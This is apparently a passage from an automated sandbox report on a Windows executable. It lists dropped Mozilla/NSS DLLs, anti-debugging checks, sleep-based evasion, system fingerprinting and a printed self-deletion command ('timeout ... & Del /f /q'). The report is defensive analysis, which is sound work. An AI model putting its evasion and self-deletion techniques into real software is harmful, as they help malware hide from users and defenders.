Source: C:\Users\user\Desktop\31cGYywxgy.exe Code function: 0_2_004000BB push edx; retf 0_2_004000C2
Source: C:\Users\user\Desktop\31cGYywxgy.exe Code function: 0_2_004407F0 push ecx; ret 0_2_00440803
PE file contains sections with non-standard names
Source: AccessibleHandler.dll.0.dr Static PE information: section name: .orpc
Source: AccessibleMarshal.dll.0.dr Static PE information: section name: .orpc
Source: IA2Marshal.dll.0.dr Static PE information: section name: .orpc
Source: lgpllibs.dll.0.dr Static PE information: section name: .rodata
Source: MapiProxy.dll.0.dr Static PE information: section name: .orpc
Source: MapiProxy_InUse.dll.0.dr Static PE information: section name: .orpc
Source: mozglue.dll.0.dr Static PE information: section name: .didat
Source: msvcp140.dll.0.dr Static PE information: section name: .didat
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\31cGYywxgy.exe Code function: 0_2_0042A2F9 GetVersionExW,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,StrStrIW,lstrlenW,lstrlenW,FreeLibrary, 0_2_0042A2F9
Binary contains a suspicious time stamp
Source: ucrtbase.dll.0.dr Static PE information: 0x9E3394C7 [Sun Feb 8 16:22:31 2054 UTC]
Source: initial sample Static PE information: section name: .text entropy: 7.97515614602

Persistence and Installation Behavior:

barindex
Drops PE files
Source: C:\Users\user\Desktop\31cGYywxgy.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-libraryloader-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\31cGYywxgy.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\prldap60.dll Jump to dropped file
Source: C:\Users\user\Desktop\31cGYywxgy.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-private-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\31cGYywxgy.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-convert-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\31cGYywxgy.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\mozMapi32.dll Jump to dropped file
Source: C:\Users\user\Desktop\31cGYywxgy.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-file-l1-2-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\31cGYywxgy.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-time-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\31cGYywxgy.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-synch-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\31cGYywxgy.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-filesystem-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\31cGYywxgy.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\libEGL.dll Jump to dropped file
Source: C:\Users\user\Desktop\31cGYywxgy.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\mozMapi32_InUse.dll Jump to dropped file
Source: C:\Users\user\Desktop\31cGYywxgy.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-utility-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\31cGYywxgy.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-runtime-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\31cGYywxgy.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-memory-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\31cGYywxgy.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-stdio-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\31cGYywxgy.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\ucrtbase.dll Jump to dropped file
Source: C:\Users\user\Desktop\31cGYywxgy.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-math-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\31cGYywxgy.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-multibyte-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\31cGYywxgy.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\nssdbm3.dll Jump to dropped file
Source: C:\Users\user\Desktop\31cGYywxgy.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\qipcap.dll Jump to dropped file
Source: C:\Users\user\Desktop\31cGYywxgy.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-processthreads-l1-1-1.dll Jump to dropped file
Source: C:\Users\user\Desktop\31cGYywxgy.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-profile-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\31cGYywxgy.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-rtlsupport-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\31cGYywxgy.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-file-l2-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\31cGYywxgy.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-locale-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\31cGYywxgy.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\ldif60.dll Jump to dropped file
Source: C:\Users\user\Desktop\31cGYywxgy.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-heap-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\31cGYywxgy.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\mozglue.dll Jump to dropped file
Source: C:\Users\user\Desktop\31cGYywxgy.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-interlocked-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\31cGYywxgy.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\ldap60.dll Jump to dropped file
Source: C:\Users\user\Desktop\31cGYywxgy.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\nss3.dll Jump to dropped file
Source: C:\Users\user\Desktop\31cGYywxgy.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\MapiProxy_InUse.dll Jump to dropped file
Source: C:\Users\user\Desktop\31cGYywxgy.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-string-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\31cGYywxgy.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-processthreads-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\31cGYywxgy.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-synch-l1-2-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\31cGYywxgy.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\freebl3.dll Jump to dropped file
Source: C:\Users\user\Desktop\31cGYywxgy.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-timezone-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\31cGYywxgy.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\breakpadinjector.dll Jump to dropped file
Source: C:\Users\user\Desktop\31cGYywxgy.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-heap-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\31cGYywxgy.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\nssckbi.dll Jump to dropped file
Source: C:\Users\user\Desktop\31cGYywxgy.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-localization-l1-2-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\31cGYywxgy.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-process-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\31cGYywxgy.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\AccessibleHandler.dll Jump to dropped file
Source: C:\Users\user\Desktop\31cGYywxgy.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\lgpllibs.dll Jump to dropped file
Source: C:\Users\user\Desktop\31cGYywxgy.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-handle-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\31cGYywxgy.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-string-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\31cGYywxgy.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-conio-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\31cGYywxgy.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-util-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\31cGYywxgy.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\MapiProxy.dll Jump to dropped file
Source: C:\Users\user\Desktop\31cGYywxgy.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\msvcp140.dll Jump to dropped file
Source: C:\Users\user\Desktop\31cGYywxgy.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-namedpipe-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\31cGYywxgy.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-processenvironment-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\31cGYywxgy.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-environment-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\31cGYywxgy.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\softokn3.dll Jump to dropped file
Source: C:\Users\user\Desktop\31cGYywxgy.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-sysinfo-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\31cGYywxgy.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\AccessibleMarshal.dll Jump to dropped file
Source: C:\Users\user\Desktop\31cGYywxgy.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\IA2Marshal.dll Jump to dropped file
Source: C:\Users\user\Desktop\31cGYywxgy.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\vcruntime140.dll Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

barindex
Self deletion via cmd delete
Source: C:\Users\user\Desktop\31cGYywxgy.exe Process created: cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q 'C:\Users\user\Desktop\31cGYywxgy.exe'
Source: C:\Users\user\Desktop\31cGYywxgy.exe Process created: cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q 'C:\Users\user\Desktop\31cGYywxgy.exe' Jump to behavior
Extensive use of GetProcAddress (often used to hide API calls)
Source: C:\Users\user\Desktop\31cGYywxgy.exe Code function: 0_2_004206DD __EH_prolog,SetCurrentDirectoryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_004206DD

Malware Analysis System Evasion:

barindex
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\31cGYywxgy.exe TID: 2212 Thread sleep time: -120000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe TID: 6612 Thread sleep count: 93 > 30 Jump to behavior
Found dropped PE file which has not been started or loaded
Source: C:\Users\user\Desktop\31cGYywxgy.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-libraryloader-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\31cGYywxgy.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-private-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\31cGYywxgy.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\prldap60.dll Jump to dropped file
Source: C:\Users\user\Desktop\31cGYywxgy.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-convert-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\31cGYywxgy.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\mozMapi32.dll Jump to dropped file
Source: C:\Users\user\Desktop\31cGYywxgy.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-file-l1-2-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\31cGYywxgy.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-time-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\31cGYywxgy.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-synch-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\31cGYywxgy.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-filesystem-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\31cGYywxgy.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\libEGL.dll Jump to dropped file
Source: C:\Users\user\Desktop\31cGYywxgy.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\mozMapi32_InUse.dll Jump to dropped file
Source: C:\Users\user\Desktop\31cGYywxgy.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-utility-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\31cGYywxgy.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-runtime-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\31cGYywxgy.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-memory-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\31cGYywxgy.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-stdio-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\31cGYywxgy.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-math-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\31cGYywxgy.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-multibyte-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\31cGYywxgy.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\nssdbm3.dll Jump to dropped file
Source: C:\Users\user\Desktop\31cGYywxgy.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\qipcap.dll Jump to dropped file
Source: C:\Users\user\Desktop\31cGYywxgy.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-processthreads-l1-1-1.dll Jump to dropped file
Source: C:\Users\user\Desktop\31cGYywxgy.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-profile-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\31cGYywxgy.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-rtlsupport-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\31cGYywxgy.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-file-l2-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\31cGYywxgy.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-locale-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\31cGYywxgy.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\ldif60.dll Jump to dropped file
Source: C:\Users\user\Desktop\31cGYywxgy.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-heap-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\31cGYywxgy.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-interlocked-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\31cGYywxgy.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\ldap60.dll Jump to dropped file
Source: C:\Users\user\Desktop\31cGYywxgy.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\MapiProxy_InUse.dll Jump to dropped file
Source: C:\Users\user\Desktop\31cGYywxgy.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-string-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\31cGYywxgy.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-processthreads-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\31cGYywxgy.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-synch-l1-2-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\31cGYywxgy.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-timezone-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\31cGYywxgy.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\freebl3.dll Jump to dropped file
Source: C:\Users\user\Desktop\31cGYywxgy.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\breakpadinjector.dll Jump to dropped file
Source: C:\Users\user\Desktop\31cGYywxgy.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-heap-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\31cGYywxgy.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\nssckbi.dll Jump to dropped file
Source: C:\Users\user\Desktop\31cGYywxgy.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-localization-l1-2-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\31cGYywxgy.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-process-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\31cGYywxgy.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\AccessibleHandler.dll Jump to dropped file
Source: C:\Users\user\Desktop\31cGYywxgy.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-handle-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\31cGYywxgy.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\lgpllibs.dll Jump to dropped file
Source: C:\Users\user\Desktop\31cGYywxgy.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-conio-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\31cGYywxgy.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-string-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\31cGYywxgy.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-util-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\31cGYywxgy.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\MapiProxy.dll Jump to dropped file
Source: C:\Users\user\Desktop\31cGYywxgy.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-namedpipe-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\31cGYywxgy.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-processenvironment-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\31cGYywxgy.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-environment-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\31cGYywxgy.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\softokn3.dll Jump to dropped file
Source: C:\Users\user\Desktop\31cGYywxgy.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-sysinfo-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\31cGYywxgy.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\IA2Marshal.dll Jump to dropped file
Source: C:\Users\user\Desktop\31cGYywxgy.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\AccessibleMarshal.dll Jump to dropped file
Is looking for software installed on the system
Source: C:\Users\user\Desktop\31cGYywxgy.exe Registry key enumerated: More than 151 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
Source: C:\Users\user\Desktop\31cGYywxgy.exe Code function: 0_2_00437819 __EH_prolog,_strftime,GetUserDefaultLCID,GetLocaleInfoA,GetUserNameA,GetUserNameA,GetComputerNameA,GetUserNameA,GetSystemInfo,GlobalMemoryStatusEx,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,EnumDisplayDevicesA,EnumDisplayDevicesA,EnumDisplayDevicesA, 0_2_00437819
Source: C:\Users\user\Desktop\31cGYywxgy.exe Code function: 0_2_0043EFDD FindClose,FindFirstFileExW,GetLastError,FindFirstFileExW,GetLastError, 0_2_0043EFDD
Source: 31cGYywxgy.exe, 00000000.00000002.282340481.0000000000738000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW
Source: 31cGYywxgy.exe, 00000000.00000002.282340481.0000000000738000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAWen-USn

Anti Debugging:

barindex
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\Desktop\31cGYywxgy.exe Code function: 0_2_0045C559 IsDebuggerPresent,OutputDebugStringW, 0_2_0045C559
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\31cGYywxgy.exe Code function: 0_2_0042A2F9 GetVersionExW,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,StrStrIW,lstrlenW,lstrlenW,FreeLibrary, 0_2_0042A2F9
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\user\Desktop\31cGYywxgy.exe Code function: 0_2_00433882 __EH_prolog,DeleteFileA,CreateFileA,CreateFileA,WriteFile,CloseHandle,CreateFileA,GetFileSize,GetProcessHeap,HeapAlloc,lstrlenA,lstrlenA,lstrcpynA,lstrcpynA,lstrlenA,lstrcpynA,ReadFile,lstrlenA,lstrcpynA,WinHttpSetOption,WinHttpSetOption,WinHttpSetOption,WinHttpConnect,WinHttpConnect,WinHttpOpenRequest,WinHttpOpenRequest,WinHttpSendRequest,WinHttpReceiveResponse,WinHttpQueryDataAvailable,WinHttpReadData,WinHttpCloseHandle,WinHttpCloseHandle,CloseHandle,DeleteFileA,WinHttpCloseHandle,GetProcessHeap,HeapFree, 0_2_00433882
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\31cGYywxgy.exe Code function: 0_2_0045A03D mov eax, dword ptr fs:[00000030h] 0_2_0045A03D
Source: C:\Users\user\Desktop\31cGYywxgy.exe Code function: 0_2_0045A081 mov eax, dword ptr fs:[00000030h] 0_2_0045A081
Source: C:\Users\user\Desktop\31cGYywxgy.exe Code function: 0_2_0045A0B2 mov eax, dword ptr fs:[00000030h] 0_2_0045A0B2
Source: C:\Users\user\Desktop\31cGYywxgy.exe Code function: 0_2_00446625 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00446625

HIPS / PFW / Operating System Protection Evasion:

barindex
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /T 10 /NOBREAK Jump to behavior

Language, Device and Operating System Detection:

barindex
Contains functionality to query locales information (e.g. system language)
Source: C:\Users\user\Desktop\31cGYywxgy.exe Code function: __EH_prolog,CoInitialize,GetUserDefaultLCID,GetLocaleInfoA,Sleep,Sleep,GetUserNameA,Sleep,_strlen,_strlen,CreateThread,CreateThread,CreateThread,CreateThread,StrToIntA,CreateThread,CreateThread,WaitForSingleObject,CreateThread,CreateThread,CreateThread,CreateThread,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,CreateThread,CreateThread,GetModuleHandleA,FreeLibrary,WaitForSingleObject,lstrlenA,lstrlenA,GetEnvironmentVariableA,ShellExecuteA,ShellExecuteA,CoUninitialize, 0_2_0042C383
Source: C:\Users\user\Desktop\31cGYywxgy.exe Code function: __EH_prolog,_strftime,GetUserDefaultLCID,GetLocaleInfoA,GetUserNameA,GetUserNameA,GetComputerNameA,GetUserNameA,GetSystemInfo,GlobalMemoryStatusEx,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,EnumDisplayDevicesA,EnumDisplayDevicesA,EnumDisplayDevicesA, 0_2_00437819
Source: C:\Users\user\Desktop\31cGYywxgy.exe Code function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW, 0_2_00462391
Source: C:\Users\user\Desktop\31cGYywxgy.exe Code function: EnumSystemLocalesW, 0_2_00458577
Source: C:\Users\user\Desktop\31cGYywxgy.exe Code function: GetLocaleInfoW, 0_2_0046258C
Source: C:\Users\user\Desktop\31cGYywxgy.exe Code function: EnumSystemLocalesW, 0_2_0046267E
Source: C:\Users\user\Desktop\31cGYywxgy.exe Code function: EnumSystemLocalesW, 0_2_00462633
Source: C:\Users\user\Desktop\31cGYywxgy.exe Code function: EnumSystemLocalesW, 0_2_00462719
Source: C:\Users\user\Desktop\31cGYywxgy.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW, 0_2_004627A4
Source: C:\Users\user\Desktop\31cGYywxgy.exe Code function: GetLocaleInfoW, 0_2_004629F7
Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\Desktop\31cGYywxgy.exe Code function: 0_2_00440985 cpuid 0_2_00440985
Source: C:\Users\user\Desktop\31cGYywxgy.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
Source: C:\Users\user\Desktop\31cGYywxgy.exe Code function: 0_2_0043E03E GetLocalTime,SystemTimeToFileTime,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z, 0_2_0043E03E
Source: C:\Users\user\Desktop\31cGYywxgy.exe Code function: 0_2_004371FA __EH_prolog,GetUserNameA,GetTimeZoneInformation,std::ios_base::_Ios_base_dtor, 0_2_004371FA
